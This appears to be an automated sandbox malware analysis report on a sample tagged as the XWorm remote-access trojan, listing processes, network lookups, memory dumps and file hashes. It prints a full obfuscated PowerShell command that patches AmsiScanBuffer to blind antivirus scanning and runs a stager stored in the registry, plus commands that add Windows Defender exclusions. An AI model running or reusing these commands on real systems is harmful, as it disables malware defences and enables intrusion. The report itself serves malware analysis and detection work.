C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe

"C:\Users\Admin\AppData\Local\Temp\Iinpdftw.exe"

C:\Users\Admin\AppData\Local\Temp\$77e1f23e

"C:\Users\Admin\AppData\Local\Temp\$77e1f23e"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GbJMDRrjyuFc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XBkbtFofyxzNOr,[Parameter(Position=1)][Type]$tWftyZHqGw)$ruVkoAIOMeM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+'e'+'c'+'t'+[Char](101)+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+'u'+'b'+'l'+'i'+''+'c'+',S'+[Char](101)+''+'a'+'le'+[Char](100)+''+[Char](44)+''+'A'+''+'n'+'siC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$ruVkoAIOMeM.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eB'+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$XBkbtFofyxzNOr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$ruVkoAIOMeM.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$tWftyZHqGw,$XBkbtFofyxzNOr).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $ruVkoAIOMeM.CreateType();}$lMAvErwPyCAKQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+'2'+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+[Char](116)+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$KIlnvZNKHUUufP=$lMAvErwPyCAKQ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+[Char](65)+'d'+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('Pu'+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FxYIxNXGCNtlacKygpy=GbJMDRrjyuFc @([String])([IntPtr]);$jSNzfMHIUzuovPzemMisQa=GbJMDRrjyuFc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$awrKPPHUiPm=$lMAvErwPyCAKQ.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+'eH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$YdkcXPVLIuhnjM=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$awrKPPHUiPm,[Object](''+'L'+'oa'+'d'+''+'L'+'ib'+[Char](114)+''+[Char](97)+''+'r'+'y'+'A'+'')));$LEbKeLlEQzHrwDnOZ=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$awrKPPHUiPm,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+'a'+'l'+''+'P'+''+'r'+'ote'+[Char](99)+''+[Char](116)+'')));$NkbOJSD=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YdkcXPVLIuhnjM,$FxYIxNXGCNtlacKygpy).Invoke('ams'+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$UYtmAyLBBKaSOGIGo=$KIlnvZNKHUUufP.Invoke($Null,@([Object]$NkbOJSD,[Object](''+[Char](65)+''+'m'+'si'+'S'+''+'c'+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$aRNyktcPCI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEbKeLlEQzHrwDnOZ,$jSNzfMHIUzuovPzemMisQa).Invoke($UYtmAyLBBKaSOGIGo,[uint32]8,4,[ref]$aRNyktcPCI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UYtmAyLBBKaSOGIGo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LEbKeLlEQzHrwDnOZ,$jSNzfMHIUzuovPzemMisQa).Invoke($UYtmAyLBBKaSOGIGo,[uint32]8,0x20,[ref]$aRNyktcPCI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue('$'+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5eec782a-f8f0-4ad9-b2e7-233dfe61a98c}

C:\Users\Admin\AppData\Local\Temp\$77f99bf3

"C:\Users\Admin\AppData\Local\Temp\$77f99bf3"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$77f99bf3'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77f99bf3'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	ip-api.com	udp
US	8.8.8.8:53	8.8.8.8.in-addr.arpa	udp
US	8.8.8.8:53	pastebin.com	udp

Files

memory/4792-0-0x0000000074FCE000-0x0000000074FCF000-memory.dmp

memory/4792-1-0x0000000000500000-0x00000000009B8000-memory.dmp

memory/4792-2-0x0000000006540000-0x0000000006786000-memory.dmp

memory/4792-3-0x0000000006D30000-0x00000000072D6000-memory.dmp

memory/4792-4-0x0000000006820000-0x00000000068B2000-memory.dmp

memory/4792-8-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-16-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-36-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-40-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-54-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-64-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-68-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-66-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-62-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-60-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-58-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-56-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-52-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-50-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-48-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-46-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-44-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-42-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-38-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-34-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-32-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-30-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-28-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-26-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-24-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-20-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-18-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-15-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-12-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-10-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-22-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-6-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-5-0x0000000006540000-0x000000000677F000-memory.dmp

memory/4792-4891-0x0000000074FC0000-0x0000000075771000-memory.dmp

memory/4792-4892-0x00000000055A0000-0x0000000005622000-memory.dmp

memory/4792-4893-0x0000000005620000-0x000000000566C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77e1f23e

MD5	a9cb0e951c7ede7c23b5ba350b4920fd
SHA1	a16b2377a77e86b2a2cd27d58c44218e8aaa1a66
SHA256	0b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864
SHA512	300111595b2ea4fc3143b25faca8f97e27286221456c792f5ea80b3fe066baf5d1d2fcca122ebe17362ea3f26fdb06388356be122389229745972bb6d0b6fad4

C:\Windows\Temp\__PSScriptPolicyTest_x2b2wwkr.dao.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2916-4905-0x0000021EE2610000-0x0000021EE2632000-memory.dmp

memory/2752-4902-0x0000000000400000-0x000000000042B000-memory.dmp

memory/4792-4901-0x0000000074FCE000-0x0000000074FCF000-memory.dmp

memory/2916-4912-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/2916-4913-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2916-4914-0x0000021EE29C0000-0x0000021EE29EA000-memory.dmp

memory/2916-4918-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2916-4919-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2916-5154-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/4792-5586-0x0000000005950000-0x00000000059A4000-memory.dmp

memory/4792-5613-0x0000000074FC0000-0x0000000075771000-memory.dmp

memory/5072-5614-0x0000000000400000-0x0000000000412000-memory.dmp

memory/5072-5615-0x0000000003C50000-0x0000000003CEC000-memory.dmp

memory/5072-5616-0x0000000005E10000-0x0000000005E76000-memory.dmp

memory/652-5655-0x0000000001340000-0x0000000001376000-memory.dmp

memory/652-5656-0x0000000005CA0000-0x00000000062CA000-memory.dmp

memory/652-5657-0x0000000005930000-0x0000000005952000-memory.dmp

memory/652-5658-0x00000000059D0000-0x0000000005A36000-memory.dmp

memory/652-5667-0x00000000062D0000-0x0000000006627000-memory.dmp

memory/652-5668-0x00000000066E0000-0x00000000066FE000-memory.dmp

memory/652-5669-0x00000000069D0000-0x0000000006A1C000-memory.dmp

memory/652-5670-0x00000000076C0000-0x00000000076F4000-memory.dmp

memory/652-5671-0x0000000070010000-0x000000007005C000-memory.dmp

memory/652-5680-0x0000000007900000-0x000000000791E000-memory.dmp

memory/652-5681-0x0000000007920000-0x00000000079C4000-memory.dmp

memory/652-5682-0x0000000008530000-0x0000000008BAA000-memory.dmp

memory/652-5683-0x0000000007EE0000-0x0000000007EFA000-memory.dmp

memory/652-5684-0x0000000007F50000-0x0000000007F5A000-memory.dmp

memory/652-5685-0x0000000008180000-0x0000000008216000-memory.dmp

memory/652-5686-0x00000000080F0000-0x0000000008101000-memory.dmp

memory/652-5687-0x0000000008120000-0x000000000812E000-memory.dmp

memory/652-5688-0x0000000008130000-0x0000000008145000-memory.dmp

memory/652-5689-0x0000000008240000-0x000000000825A000-memory.dmp

memory/652-5690-0x0000000008220000-0x0000000008228000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5	ac4917a885cf6050b1a483e4bc4d2ea5
SHA1	b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256	e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512	092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

memory/4500-5726-0x0000000005E20000-0x0000000006177000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	d9a87334a1d8ba2357dcd483f46619d6
SHA1	ddedc337ae9948626e725c6ea6c2e1f37e770442
SHA256	0afd2c42ab9b82150495423c6b72322d60a2f506fa0bb814f7e8a57bbd5a4f4c
SHA512	cfad686e601926235d64d9188bcf1468ce1500f909c7132580f958e16eaf3615adcc6f12e97520c5735f8a994a7e08c06204898b0da414fafb557065f44af42c

memory/4500-5728-0x0000000070010000-0x000000007005C000-memory.dmp

Malware Analysis Report

2024-09-11 13:54

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

Malicious Activity Summary

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Sample ID	240615-fwm16atcrr
Target	Iinpdftw.exe
SHA256	0b75189b6f3d6e031159d20e351d60f6dd8956642e16d55083936096f73eb864
Tags	xworm execution rat trojan